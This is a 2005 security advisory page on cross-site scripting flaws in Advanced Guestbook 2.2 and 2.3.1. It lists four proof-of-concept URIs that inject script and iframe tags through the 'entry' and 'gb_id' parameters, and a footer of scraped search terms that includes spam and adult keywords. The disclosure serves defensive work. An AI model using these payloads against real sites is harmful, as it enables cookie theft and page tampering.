about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Advanced Guestbook Multiple Cross-Site Scripting Vulnerabilities


Title Advanced Guestbook Multiple Cross-Site Scripting Vulnerabilities
Published 2005-12-19-12:00AM
Updated 2005-12-19-07:16PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Handrix <handrix_at_morx_org> is credited with the discovery of this vulnerability.
Vulnerable  Advanced Guestbook Advanced Guestbook 2.3.1
Advanced Guestbook Advanced Guestbook 2.2
Not Vulnerable  
Code   No exploit is required.

Example URI have been provided:


http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframesrc=http://www.example.com/>

http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAMESRC="javascript:alert('XSS');"></IFRAME>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 21:36:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
apache 2. www.tamel WWW.SEX SE featur Video sex- rayan Microsoft achg sendmail-8 cisco rout remote+roo squidoo.co Elmo sex flims news for c 0&amp; Indoonesia Videoscort jpeg vulne 1600n agobot below 18 s fierybabes bahara gol vBulletin Tilix www.i12530 Subdreamer WAPTRICK.C elisa Www.srayas aws_sadmin qiyang.98m sexfelm.co sunssh newssearch mallusexyg www.nbtcgw pictures Crack+D\r\ hack SQL Inject sexfelm.co free porn www.cat08. sexy total www.deskto port 4899 sex99% Membuat an